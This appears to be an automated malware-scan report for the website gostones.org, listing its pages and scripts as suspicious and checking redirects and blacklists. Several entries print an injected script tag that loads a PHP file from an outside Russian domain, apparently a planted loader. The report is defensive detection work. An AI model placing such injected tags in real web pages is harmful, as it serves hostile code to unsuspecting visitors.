Scanned pages/files
Request | Server response | Status |
http://gostones.org/ | 200 OK Content-Length: 10582 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://limo-tour.ru/contacts/zxbgjvmd.php?id=4522989"></script> | ||
http://gostones.org/js/jquery-1.4.2.js | 200 OK Content-Length: 170127 Content-Type: application/javascript | suspicious |
Suspicious code found | ||
http://gostones.org/js/index.js | 200 OK Content-Length: 2089 Content-Type: application/javascript | suspicious |
Suspicious code found | ||
http://www.statcounter.com/counter/counter.js | 200 OK Content-Length: 21363 Content-Type: application/x-javascript | clean |
http://gostones.org/igrago.html | 200 OK Content-Length: 6853 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://limo-tour.ru/contacts/zxbgjvmd.php?id=4522988"></script> | ||
http://gostones.org/js/igrago.js | 200 OK Content-Length: 2089 Content-Type: application/javascript | suspicious |
Suspicious code found | ||
http://gostones.org/katalog.html | 200 OK Content-Length: 77895 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://limo-tour.ru/contacts/zxbgjvmd.php?id=4522990"></script> | ||
http://gostones.org/./js/jquery-1.4.2.min.js | 200 OK Content-Length: 72358 Content-Type: application/javascript | suspicious |
Suspicious code found | ||
http://gostones.org/./fancybox/jquery.fancybox-1.3.1.js | 200 OK Content-Length: 25471 Content-Type: application/javascript | suspicious |
Suspicious code found | ||
http://gostones.org/js/hhh.js | 200 OK Content-Length: 8807 Content-Type: application/javascript | suspicious |
Suspicious code found | ||
http://gostones.org/js/korz2.js | 200 OK Content-Length: 37507 Content-Type: application/javascript | suspicious |
Suspicious code found | ||
http://gostones.org/turnir/ | 200 OK Content-Length: 6480 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://limo-tour.ru/contacts/zxbgjvmd.php?id=4523049"></script> | ||
http://gostones.org/js/turnir.js | 200 OK Content-Length: 1842 Content-Type: application/javascript | suspicious |
Suspicious code found | ||
http://gostones.org/js/stripeme.js | 200 OK Content-Length: 231 Content-Type: application/javascript | suspicious |
Suspicious code found | ||
http://gostones.org/kontakt.html | 200 OK Content-Length: 4911 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://limo-tour.ru/contacts/zxbgjvmd.php?id=4522992"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gostones.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 25 Apr 2015 16:07:09 GMT
Server: Apache/2.4.4 (Fedora) PHP/5.4.17
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/5.4.17
GET / HTTP/1.1
Host: gostones.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 25 Apr 2015 16:07:09 GMT
Server: Apache/2.4.4 (Fedora) PHP/5.4.17
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/5.4.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: gostones.org
Referer: http://www.google.com/search?q=gostones.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gostones.org
Referer: http://www.google.com/search?q=gostones.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gostones.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gostones.org/
Result: gostones.org is not infected or malware details are not published yet.
Result: gostones.org is not infected or malware details are not published yet.